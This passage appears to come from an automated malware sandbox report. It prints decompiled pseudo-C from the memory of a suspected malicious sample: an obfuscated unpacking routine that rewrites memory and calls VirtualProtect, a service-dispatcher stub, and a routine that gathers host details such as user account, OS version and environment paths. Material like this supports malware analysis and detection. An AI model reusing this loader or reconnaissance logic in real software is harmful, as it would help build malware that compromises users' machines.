					if( *(_t417 + 0x43523f) == 0) {
						_t413 =  *((intOrPtr*)(_t417 + 0x441060))(_t337);
						 *(_t417 + 0x43523f) =  *(_t417 + 0x43523f) & 0x00000000;
						 *(_t417 + 0x43523f) =  *(_t417 + 0x43523f) | _t479 -  *_t571 | _t413;
						_t479 = _t479;
						_t337 =  *_t571;
						_t571 =  &(_t571[1]);
					}
					 *(_t417 + 0x4352b0) =  *(_t417 + 0x4352b0) & 0x00000000;
					 *(_t417 + 0x4352b0) =  *(_t417 + 0x4352b0) | _t523 ^  *_t571 | _t337;
					_t523 = _t523;
					if( *(_t417 + 0x4351b3) == 0) {
						_t337 =  *((intOrPtr*)(_t417 + 0x4410a8))( *((intOrPtr*)(_t417 + 0x435978)),  *((intOrPtr*)(_t417 + 0x4356a9)));
						_push(_t426);
						 *(_t417 + 0x4351b3) =  *(_t417 + 0x4351b3) & 0x00000000;
						 *(_t417 + 0x4351b3) =  *(_t417 + 0x4351b3) ^ (_t426 & 0x00000000 | _t337);
					}
					_pop( *_t46);
					_t450 = _v12;
					_t426 =  *_t571;
					_t571 =  &(_t571[1]);
					if( *(_t417 + 0x4353c2) == 0) {
						_t337 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x4352a8, _t450, _t426);
						_v12 = _t479;
						 *(_t417 + 0x4353c2) =  *(_t417 + 0x4353c2) & 0x00000000;
						 *(_t417 + 0x4353c2) =  *(_t417 + 0x4353c2) | _t479 - _v12 | _t337;
						_t479 = _v12;
						_t450 =  *_t571;
						_t575 =  &(_t571[1]);
						_t426 =  *_t575;
						_t571 = _t575 - 0xfffffffc;
					}
				}
				_push(_t450);
				_push(_t426);
				_t339 = _t337 & 0x00000000 ^ (_t523 ^  *_t571 | _a4);
				_t526 = _t523;
				if( *(_t417 + 0x43524c) == 0) {
					_t409 =  *((intOrPtr*)(_t417 + 0x44105c))();
					_v12 = _t450;
					 *(_t417 + 0x43524c) =  *(_t417 + 0x43524c) & 0x00000000;
					 *(_t417 + 0x43524c) =  *(_t417 + 0x43524c) ^ (_t450 & 0x00000000 | _t409);
					_t450 = _v12;
					 *_t67 = _t339;
					_t339 = 0 + _v12;
				}
				if( *(_t417 + 0x43539a) == 0) {
					_t404 =  *((intOrPtr*)(_t417 + 0x441044))(_t417 + 0x435020, _t417 + 0x435a31, _t339);
					 *(_t417 + 0x43517e) =  *(_t417 + 0x43517e) & 0x00000000;
					 *(_t417 + 0x43517e) =  *(_t417 + 0x43517e) ^ (_t479 & 0x00000000 | _t404);
					_t516 = _t479;
					_t405 =  *((intOrPtr*)(_t417 + 0x441060))();
					 *(_t417 + 0x43539a) =  *(_t417 + 0x43539a) & 0x00000000;
					 *(_t417 + 0x43539a) =  *(_t417 + 0x43539a) | _t516 -  *_t571 ^ _t405;
					_t479 = _t516;
					if( *(_t417 + 0x4355b1) == 0) {
						_t408 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x435068);
						 *(_t417 + 0x4355b1) =  *(_t417 + 0x4355b1) & 0x00000000;
						 *(_t417 + 0x4355b1) =  *(_t417 + 0x4355b1) ^ (_t426 ^  *_t571 | _t408);
						_t426 = _t426;
					}
					_t339 =  *_t571;
					_t571 = _t571 - 0xfffffffc;
				}
				 *_t93 =  *((intOrPtr*)(_t417 + 0x441044))(_t417 + 0x435669, _t417 + 0x4350e8, _t339 +  *((intOrPtr*)(_t339 + 0x3c)));
				_push(_v12);
				_pop( *_t95);
				_t572 = _t571 - 0xfffffffc;
				_push(0 ^  *_t571);
				_t346 = _t417 + 0x43517b;
				if( *(_t417 + 0x43525c) == 0) {
					_t400 =  *((intOrPtr*)(_t417 + 0x4410a8))( *((intOrPtr*)(_t417 + 0x4352d7)),  *((intOrPtr*)(_t417 + 0x43563d)), _t346);
					_v12 = _t450;
					 *(_t417 + 0x43525c) =  *(_t417 + 0x43525c) & 0x00000000;
					 *(_t417 + 0x43525c) =  *(_t417 + 0x43525c) ^ (_t450 - _v12 | _t400);
					_t450 = _v12;
					_t346 = (_t400 & 0x00000000) +  *_t572;
					_t572 = _t572 - 0xfffffffc;
				}
				_push(_t346);
				_t347 = _t417 + 0x435162;
				if( *(_t417 + 0x4357ee) == 0) {
					_t398 =  *((intOrPtr*)(_t417 + 0x441060))();
					_v12 = _t479;
					 *(_t417 + 0x4357ee) =  *(_t417 + 0x4357ee) & 0x00000000;
					 *(_t417 + 0x4357ee) =  *(_t417 + 0x4357ee) ^ _t479 - _v12 ^ _t398;
					_t479 = _v12;
					 *_t118 = _t347;
					_t347 = 0 + _v12;
				}
				_t348 =  *((intOrPtr*)(_t417 + 0x441044))();
				_v12 = _t526;
				 *(_t417 + 0x43516b) =  *(_t417 + 0x43516b) & 0x00000000;
				 *(_t417 + 0x43516b) =  *(_t417 + 0x43516b) | _t526 - _v12 ^ _t348;
				_t529 = _v12;
				 *_t128 = _t347;
				_t350 = 0 + _v12;
				if( *(_t417 + 0x4357de) == 0) {
					_t397 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x4350d4, _t350);
					 *(_t417 + 0x4357de) =  *(_t417 + 0x4357de) & 0x00000000;
					 *(_t417 + 0x4357de) =  *(_t417 + 0x4357de) | _t450 -  *_t572 ^ _t397;
					_t450 = _t450;
					_pop( *_t137);
					_t350 = _v12;
				}
				_push(_t350);
				_v12 = _t450;
				_t481 = _t479 & 0x00000000 ^ (_t450 ^ _v12 | _t350);
				_t351 =  *(_t481 + 6) & 0x0000ffff;
				if( *(_t417 + 0x435579) == 0) {
					_t394 =  *((intOrPtr*)(_t417 + 0x4410a4))( *((intOrPtr*)(_t417 + 0x4352a4)), _t351);
					 *_t572 = _t529;
					 *(_t417 + 0x435579) = 0 ^ _t394;
					_t529 = 0;
					_t351 = 0 ^  *_t572;
					_t572 =  &(_t572[1]);
				}
				if( *((intOrPtr*)(_t417 + 0x435575)) == 0) {
					if( *(_t417 + 0x43534a) == 0) {
						_t392 =  *((intOrPtr*)(_t417 + 0x441060))(_t351);
						 *(_t417 + 0x43534a) =  *(_t417 + 0x43534a) & 0x00000000;
						 *(_t417 + 0x43534a) =  *(_t417 + 0x43534a) | _t529 -  *_t572 | _t392;
						_t529 = _t529;
						_t351 =  *_t572;
						_t572 = _t572 - 0xfffffffc;
					}
					_push(_t351);
					_push(_t417 + 0x43573a);
					if( *(_t417 + 0x43580e) == 0) {
						_t391 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x43505c);
						_v12 = _t529;
						 *(_t417 + 0x43580e) =  *(_t417 + 0x43580e) & 0x00000000;
						 *(_t417 + 0x43580e) =  *(_t417 + 0x43580e) | _t529 & 0x00000000 | _t391;
						_t529 = _v12;
					}
					_t384 =  *((intOrPtr*)(_t417 + 0x441054))();
					if( *(_t417 + 0x435555) == 0) {
						_t388 =  *((intOrPtr*)(_t417 + 0x441060))(_t384);
						 *(_t417 + 0x435555) =  *(_t417 + 0x435555) & 0x00000000;
						 *(_t417 + 0x435555) =  *(_t417 + 0x435555) ^ _t426 ^  *_t572 ^ _t388;
						_t426 = _t426;
						_t384 = _t388 & 0x00000000 |  *_t572;
						_t572 = _t572 - 0xfffffffc;
					}
					 *_t171 = _t384;
					_push(_v12);
					_pop( *_t173);
					if( *((intOrPtr*)(_t417 + 0x435716)) == 0) {
						 *_t177 =  *((intOrPtr*)(_t417 + 0x44106c))(_t417 + 0x4358e4);
						_push(_v12);
						_pop( *_t179);
					}
					_pop( *_t180);
					_t351 = 0 + _v12;
				}
				_v12 = _t481;
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 ^ (_t481 ^ _v12 | _t351);
				_t484 = _v12;
				if( *(_t417 + 0x43577a) == 0) {
					_t351 =  *((intOrPtr*)(_t417 + 0x4410a8))(0,  *((intOrPtr*)(_t417 + 0x4351e3)));
					 *_t572 = _t484;
					 *(_t417 + 0x43577a) = _t351;
					_t484 = 0;
				}
				_push(_t484);
				if( *(_t417 + 0x435008) == 0) {
					_t351 =  *((intOrPtr*)(_t417 + 0x441058))();
					 *(_t417 + 0x435008) =  *(_t417 + 0x435008) & 0x00000000;
					 *(_t417 + 0x435008) =  *(_t417 + 0x435008) | _t529 & 0x00000000 ^ _t351;
					_t529 = _t529;
				}
				 *_t572 = _t417;
				_t454 = 0 ^  *(_t484 + 0x54);
				_t420 = 0;
				_v12 = _t351;
				_t486 = _t484 & 0x00000000 ^ (_t351 - _v12 |  *(_t420 + 0x4350b0));
				if( *(_t420 + 0x435156) == 0) {
					_t205 = _t420 + 0x435900; // 0x435900
					_t382 =  *((intOrPtr*)(_t420 + 0x44106c))(_t205, _t454);
					_v12 = _t486;
					 *(_t420 + 0x435156) =  *(_t420 + 0x435156) & 0x00000000;
					 *(_t420 + 0x435156) =  *(_t420 + 0x435156) | _t486 ^ _v12 | _t382;
					_t486 = _v12;
					_t454 =  *_t572;
					_t572 =  &(_t572[1]);
				}
				_t531 = _t529 & 0x00000000 | _t420 & 0x00000000 ^ _a4;
				_t423 = _t420;
				_t428 = _t426 & 0x00000000 ^ (_t562 & 0x00000000 | _t454);
				_t565 = _t562;
				if(_t486 == _t531) {
					L50:
					_pop( *_t258);
					if( *(_t423 + 0x4354c6) == 0) {
						_t371 =  *((intOrPtr*)(_t423 + 0x441058))();
						_v12 = _t531;
						 *(_t423 + 0x4354c6) =  *(_t423 + 0x4354c6) & 0x00000000;
						 *(_t423 + 0x4354c6) =  *(_t423 + 0x4354c6) ^ _t531 ^ _v12 ^ _t371;
						_t531 = _v12;
					}
					_t489 =  &_a244;
					_t568 = _t565;
					do {
						_t431 = _t428;
						_v12 = _t423;
						_t433 = _t431 & 0x00000000 | _t423 & 0x00000000 ^  *(_t489 + 0x10);
						_t423 = _v12;
						_t273 = _t423 + 0x4350ed; // 0x4350ed
						_t274 = _t423 + 0x43585d; // 0x43585d
						_t357 =  *((intOrPtr*)(_t423 + 0x441044))(_t274, _t273, _t433, _t489);
						 *(_t423 + 0x435294) =  *(_t423 + 0x435294) & 0x00000000;
						 *(_t423 + 0x435294) =  *(_t423 + 0x435294) | _t489 & 0x00000000 ^ _t357;
						_t492 = _t489;
						_t531 = (_t531 & 0x00000000 | _t428 & 0x00000000 | _a4) +  *((intOrPtr*)(_t492 + 0x14));
						_t358 = memcpy( *((intOrPtr*)(_t492 + 0xc)) +  *(_t423 + 0x4350b0), _t531, _t433 & 0x00000000 |  *_t572);
						_t572 =  &((_t572 - 0xfffffffc)[3]);
						_t428 = 0;
						if( *(_t423 + 0x435944) == 0) {
							_t284 = _t423 + 0x435a21; // 0x435a21
							_t358 =  *((intOrPtr*)(_t423 + 0x441054))(_t284);
							_v12 = _t531;
							 *(_t423 + 0x435944) = 0 ^ _t358;
							_t531 = _v12;
						}
						_pop( *_t289);
						_t489 =  &_a36;
						_t568 = _t568;
						if( *(_t423 + 0x4356c1) == 0) {
							_t358 =  *((intOrPtr*)(_t423 + 0x4410a4))(1);
							_v12 = _t531;
							 *(_t423 + 0x4356c1) = _t358;
							_t531 = _v12;
						}
						_t296 =  &_v8;
						 *_t296 = _v8 - 1;
					} while ( *_t296 != 0);
					if( *(_t423 + 0x435018) == 0) {
						_t358 =  *((intOrPtr*)(_t423 + 0x4410a8))( *((intOrPtr*)(_t423 + 0x43549a)), 9);
						_push(0);
						 *_t572 = _t489;
						 *(_t423 + 0x435018) = 0 ^ _t358;
					}
					_t500 =  *_t572;
					_t574 = _t572 - 0xfffffffc;
					_v12 = _t454;
					_t457 = _v12;
					_t361 = (_t358 & 0x00000000 ^ _t454 ^ _v12 ^  *(_t500 + 0x28)) +  *(_t423 + 0x4350b0);
					if( *(_t423 + 0x435376) == 0) {
						_t308 = _t423 + 0x435524; // 0x435524
						_t368 =  *((intOrPtr*)(_t423 + 0x44106c))(_t361);
						_v12 = _t531;
						 *(_t423 + 0x435376) =  *(_t423 + 0x435376) & 0x00000000;
						 *(_t423 + 0x435376) =  *(_t423 + 0x435376) | _t531 ^ _v12 | _t368;
						_t531 = _v12;
						 *_t317 = _t308;
						_t361 = _t368 & 0x00000000 ^ _v12;
					}
					_v12 = _t500;
					 *(_t423 + 0x4351a7) =  *(_t423 + 0x4351a7) & 0x00000000;
					 *(_t423 + 0x4351a7) =  *(_t423 + 0x4351a7) | _t500 ^ _v12 ^ _t361;
					_t503 = _v12;
					_t535 = _t531 & 0x00000000 ^ (_t361 & 0x00000000 |  *(_t423 + 0x4350b0));
					_t364 = _t361;
					if((_t531 & 0x00000000 ^ (_t361 & 0x00000000 |  *(_t423 + 0x4350b0))) > 0) {
						if( *(_t423 + 0x43536e) == 0) {
							_t366 =  *((intOrPtr*)(_t423 + 0x441070))(0);
							 *(_t423 + 0x43536e) =  *(_t423 + 0x43536e) & 0x00000000;
							 *(_t423 + 0x43536e) =  *(_t423 + 0x43536e) | _t457 ^  *_t574 | _t366;
							_t457 = _t457;
						}
						_t365 = E00492C41(_t423, _t428, _t457, _t503, _t535, _t535); // executed
						_t364 = E004934DA(_t365, _t423, _t428, _t457, _t503, _t535, _t535);
					}
					_pop( *_t333);
					_pop( *_t335);
					return _t364;
				} else {
					if( *(_t423 + 0x435004) == 0) {
						_t380 =  *((intOrPtr*)(_t423 + 0x4410a8))( *((intOrPtr*)(_t423 + 0x4352fb)),  *((intOrPtr*)(_t423 + 0x4354e6)), _t454, _t428);
						_v12 = _t454;
						 *(_t423 + 0x435004) =  *(_t423 + 0x435004) & 0x00000000;
						 *(_t423 + 0x435004) =  *(_t423 + 0x435004) ^ _t454 & 0x00000000 ^ _t380;
						_pop( *_t225);
						_t454 = _v12;
						_pop( *_t227);
						_t428 = _v12 + (_t428 & 0x00000000);
					}
					do {
						asm("movsb");
						_t428 = _t428 - 1;
					} while (_t428 != 0);
					if( *(_t423 + 0x4359f5) == 0) {
						_t230 = _t423 + 0x4356a1; // 0x4356a1
						_t379 =  *((intOrPtr*)(_t423 + 0x441068))(_t230, _t454);
						_v12 = _t531;
						 *(_t423 + 0x4359f5) =  *(_t423 + 0x4359f5) & 0x00000000;
						 *(_t423 + 0x4359f5) =  *(_t423 + 0x4359f5) ^ _t531 - _v12 ^ _t379;
						_t531 = _v12;
						_t454 = _t454 & 0x00000000 |  *_t572;
						_t572 = _t572 - 0xfffffffc;
					}
					_t486 = _t486 & 0x00000000 ^ (_t428 -  *_t572 |  *(_t423 + 0x4350b0));
					_t428 = _t428;
					 *((intOrPtr*)(_t423 + 0x4354d2)) = 0x40;
					_t241 = _t423 + 0x4356e5; // 0x4356e5
					_t242 = _t423 + 0x4352b4; // 0x4352b4
					_t374 =  *((intOrPtr*)(_t423 + 0x441044))(_t242, _t241, _t454);
					 *(_t423 + 0x4351cb) =  *(_t423 + 0x4351cb) & 0x00000000;
					 *(_t423 + 0x4351cb) =  *(_t423 + 0x4351cb) | _t531 ^  *_t572 ^ _t374;
					_t531 = _t531;
					_t454 =  *_t572;
					_t572 = _t572 - 0xfffffffc;
					_t248 = _t423 + 0x4354d2; // 0x4354d2
					_push(2);
					_push(_t454);
					if( *(_t423 + 0x435010) == 0) {
						_t377 =  *((intOrPtr*)(_t423 + 0x441058))();
						_v12 = _t531;
						 *(_t423 + 0x435010) =  *(_t423 + 0x435010) & 0x00000000;
						 *(_t423 + 0x435010) =  *(_t423 + 0x435010) ^ _t531 & 0x00000000 ^ _t377;
						_t531 = _v12;
					}
					VirtualProtect(_t486, ??, ??, ??);
					goto L50;
				}
			}

0x0049242a
0x0049242a
0x0049242a
0x0049242a
0x0049242a
0x00492437
0x00492439
0x0049243a
0x00492441
0x00492442
0x00492448
0x00492450
0x00492457
0x00492466
0x00492469
0x00492472
0x00492475
0x00492475
0x0049247f
0x00492485
0x00492486
0x0049248e
0x00492498
0x0049249e
0x004924a6
0x004924ad
0x004924b3
0x004924b3
0x004924bd
0x004924ca
0x004924cd
0x004924d9
0x004924e0
0x004924e6
0x004924e9
0x004924ec
0x004924ec
0x004924f5
0x004924fc
0x00492502
0x0049250a
0x00492518
0x0049251e
0x00492524
0x0049252b
0x00492531
0x00492532
0x00492535
0x0049253a
0x0049253d
0x00492547
0x00492552
0x00492558
0x00492560
0x00492567
0x0049256d
0x00492572
0x00492575
0x0049257a
0x0049257d
0x0049257d
0x00492547
0x00492580
0x00492581
0x0049258c
0x0049258e
0x00492596
0x00492599
0x0049259f
0x004925a7
0x004925ae
0x004925b4
0x004925b9
0x004925bc
0x004925bc
0x004925c6
0x004925d7
0x004925e3
0x004925ea
0x004925f0
0x004925f1
0x004925fd
0x00492604
0x0049260a
0x00492612
0x0049261b
0x00492627
0x0049262e
0x00492634
0x00492634
0x00492637
0x0049263a
0x0049263a
0x00492656
0x00492659
0x0049265c
0x00492667
0x0049266a
0x0049266b
0x00492678
0x00492687
0x0049268d
0x00492695
0x0049269c
0x004926a2
0x004926ab
0x004926ae
0x004926ae
0x004926b1
0x004926b2
0x004926bf
0x004926c2
0x004926c8
0x004926d0
0x004926d7
0x004926dd
0x004926e2
0x004926e5
0x004926e5
0x004926e9
0x004926ef
0x004926f7
0x004926fe
0x00492704
0x00492709
0x0049270c
0x00492716
0x00492720
0x0049272c
0x00492733
0x00492739
0x0049273a
0x0049273d
0x0049273d
0x00492740
0x00492741
0x0049274c
0x00492751
0x0049275c
0x00492765
0x0049276d
0x00492774
0x0049277a
0x0049277d
0x00492780
0x00492780
0x0049278a
0x00492797
0x0049279a
0x004927a6
0x004927ad
0x004927b3
0x004927ba
0x004927bd
0x004927bd
0x004927c0
0x004927c7
0x004927cf
0x004927d8
0x004927de
0x004927e6
0x004927ed
0x004927f3
0x004927f3
0x004927f6
0x00492803
0x00492806
0x00492812
0x00492819
0x0049281f
0x00492826
0x00492829
0x00492829
0x0049282d
0x00492830
0x00492833
0x00492840
0x00492850
0x00492853
0x00492856
0x00492856
0x0049285e
0x00492861
0x00492861
0x00492864
0x0049286c
0x00492870
0x00492873
0x0049287d
0x00492887
0x0049288f
0x00492896
0x0049289c
0x0049289c
0x0049289d
0x004928a5
0x004928a7
0x004928b3
0x004928ba
0x004928c0
0x004928c0
0x004928c3
0x004928cb
0x004928cd
0x004928ce
0x004928dd
0x004928e9
0x004928ec
0x004928f3
0x004928f9
0x00492901
0x00492908
0x0049290e
0x00492913
0x00492916
0x00492916
0x00492923
0x00492925
0x0049292f
0x00492931
0x00492934
0x00492a43
0x00492a49
0x00492a56
0x00492a58
0x00492a5e
0x00492a66
0x00492a6d
0x00492a73
0x00492a73
0x00492a7f
0x00492a81
0x00492a82
0x00492a8f
0x00492a90
0x00492a9c
0x00492a9e
0x00492aa2
0x00492aa9
0x00492ab0
0x00492abc
0x00492ac3
0x00492ac9
0x00492ad6
0x00492ae2
0x00492ae2
0x00492ae2
0x00492aeb
0x00492aed
0x00492af4
0x00492afa
0x00492b01
0x00492b07
0x00492b07
0x00492b10
0x00492b1f
0x00492b21
0x00492b29
0x00492b2d
0x00492b33
0x00492b3a
0x00492b40
0x00492b40
0x00492b43
0x00492b43
0x00492b43
0x00492b53
0x00492b5d
0x00492b63
0x00492b65
0x00492b6c
0x00492b72
0x00492b75
0x00492b78
0x00492b7b
0x00492b89
0x00492b8c
0x00492b99
0x00492b9c
0x00492ba3
0x00492ba9
0x00492bb1
0x00492bb8
0x00492bbe
0x00492bc7
0x00492bca
0x00492bca
0x00492bcd
0x00492bd5
0x00492bdc
0x00492be2
0x00492bf2
0x00492bf4
0x00492bf8
0x00492c01
0x00492c05
0x00492c11
0x00492c18
0x00492c1e
0x00492c1e
0x00492c20
0x00492c26
0x00492c26
0x00492c2b
0x00492c37
0x00492c3e
0x0049293a
0x00492941
0x00492951
0x00492957
0x0049295f
0x00492966
0x0049296f
0x00492972
0x0049297b
0x0049297e
0x0049297e
0x00492981
0x00492981
0x00492982
0x00492982
0x0049298c
0x0049298f
0x00492996
0x0049299c
0x004929a4
0x004929ab
0x004929b1
0x004929ba
0x004929bd
0x004929bd
0x004929cd
0x004929cf
0x004929d0
0x004929db
0x004929e2
0x004929e9
0x004929f5
0x004929fc
0x00492a02
0x00492a05
0x00492a08
0x00492a0b
0x00492a12
0x00492a14
0x00492a1c
0x00492a1e
0x00492a24
0x00492a2c
0x00492a33
0x00492a39
0x00492a39
0x00492a3d
0x00000000
0x00492a3d

APIs

VirtualProtect.KERNEL32(00000000,00000000,00000002,004354D2), ref: 00492A3D

Memory Dump Source

Source File: 0000000D.00000002.559938284.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 965ff0d501365a58e1c6b305a2901c127183e1ebb994f7cd1b7f885fc6bc8627
Instruction ID: f492f7cac71f20257025ee1ee45001ccb78879ddebe887041743470a6d90410c
Opcode Fuzzy Hash: 965ff0d501365a58e1c6b305a2901c127183e1ebb994f7cd1b7f885fc6bc8627
Instruction Fuzzy Hash: F3426D72810604EFFF00DFA4C98979A7BB5FF54325F0851AADC0DAE149C77856A4CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 100030B7, Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100030B7() {
				int _t3;
				struct _SERVICE_TABLE_ENTRY* _t6;
				int* _t11;
				intOrPtr _t12;

				_t3 = E10008604(0x10);
				 *0x1001e71c = _t3;
				if(_t3 == 0) {
					L4:
					return _t3 | 0xffffffff;
				} else {
					_t3 = E10008604(0xa);
					_t11 =  *0x1001e71c; // 0x15f36e0
					 *_t11 = _t3;
					if(_t3 == 0) {
						goto L4;
					} else {
						_t12 =  *0x1001e688; // 0x15d0590
						E1000902D(1, _t3, 7, 8, _t12 + 0x648);
						_t6 =  *0x1001e71c; // 0x15f36e0
						 *((intOrPtr*)(_t6 + 4)) = E10003052;
						_t3 = StartServiceCtrlDispatcherA(_t6);
						if(_t3 == 0) {
							goto L4;
						} else {
							return 0;
						}
					}
				}
			}

0x100030b9
0x100030be
0x100030c6
0x10003119
0x1000311c
0x100030c8
0x100030ca
0x100030d0
0x100030d6
0x100030da
0x00000000
0x100030dc
0x100030dc
0x100030f2
0x100030f7
0x100030ff
0x1000310c
0x10003114
0x00000000
0x10003116
0x10003118
0x10003118
0x10003114
0x100030da

APIs

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

StartServiceCtrlDispatcherA.ADVAPI32(015F36E0), ref: 1000310C

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocCtrlDispatcherHeapServiceStart
String ID:
API String ID: 3270895466-0
Opcode ID: 8e36714de1a88bfbba535e0dee9b6efdb0d5928a7c2cdeb04c08aa71bf5ba524
Instruction ID: ac16b269da70e1785f3d8de3b20eaf3184fc588054e4d94b314cf4149a8ccc23
Opcode Fuzzy Hash: 8e36714de1a88bfbba535e0dee9b6efdb0d5928a7c2cdeb04c08aa71bf5ba524
Instruction Fuzzy Hash: 59F03AB42443428BF748CB74DC92B5A3398EB44394F55C128E615CB2D5EE75D8128A14

Uniqueness

Uniqueness Score: -1.00%

Function 1000D01F, Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000D01F(void* __fp0) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				short _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				void** _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				intOrPtr _t111;
				long _t115;
				signed int _t117;
				long _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				long _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x1001e69c; // 0x10000000
				_t81 = E10008604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x1001e684; // 0x164faa0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E1000BA05(); // executed
				 *(_t222 + 0x110) = _t88;
				_t178 =  *_t88;
				if(E1000BB8D( *_t88) == 0) {
					_t90 = E1000BA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220, executed
				_t91 = E1000E3F1(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
				_t92 = E1000E3B6(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
				 *(_t222 + 0x224) = _t162;
				_v12 = 0x80;
				_v8 = 0x100;
				_t22 = _t222 + 0x114; // 0x114
				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
					GetLastError();
				}
				_t97 =  *0x1001e694; // 0x164fbf8
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114, executed
				_t103 = E1000B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E1000B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E10008FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E1000B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess(); // executed
				_t111 = E1000BBDF(_t110); // executed
				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x1001e684; // 0x164faa0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E100095E1(_t199, 0x10c);
				_t200 =  *0x1001e684; // 0x164faa0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x1001e684; // 0x164faa0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E100085D5( &_v8);
				_t124 =  *0x1001e684; // 0x164faa0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E10009640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x1001e684; // 0x164faa0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x1001e684; // 0x164faa0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x1001e684; // 0x164faa0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
